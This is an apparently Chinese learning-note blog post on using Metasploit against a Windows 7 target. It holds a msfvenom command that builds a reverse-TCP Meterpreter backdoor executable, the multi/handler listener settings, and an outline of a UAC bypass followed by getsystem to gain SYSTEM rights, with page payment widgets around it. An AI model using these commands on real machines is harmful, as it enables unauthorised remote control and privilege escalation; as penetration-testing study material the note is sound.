matesploit提权绕过UAC

在学习matesploit的过程,遇到很多问题,一些问题花了好长时间,看了许多的大佬的文章才得到解决,唯恐以后自己忘记,同时希望有遇到同样问题的朋友碰巧看到而得到解决。(大佬搬运工)

1 启动postgresql数据库,然后启动msf
2 制作windows后门payload,msfvenom -p windows/meterpreter/reverse_tcp lhost=本机ip lport=port -f exe >文件名,

在root目录下就可以看到生成的payload文件


3 把生成的payl发送到目标机上(这里是win7)并运行;在Kali上配置反弹shell的payload:
    use exploit/multi/hander;    set payload windows/meterpreter/reverse_tcp;    set lhost=本机ip;    set port=port;
    启动监听run/exploit;

4 当出现meterpreter时,就表示成功渗透到了目标机,输入getuid查看当前权限,不是system最高权限。渗透的目标当然是获取最高权限,当输入getsystem时,报错:

这表示我们收到了UAC用户账号控制的拦截,可以用meterpreter绕过:

执行run/exploit,成功后,重新用getsystem进行提权:

这样就得到目标机的system权限。

 

 

 

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值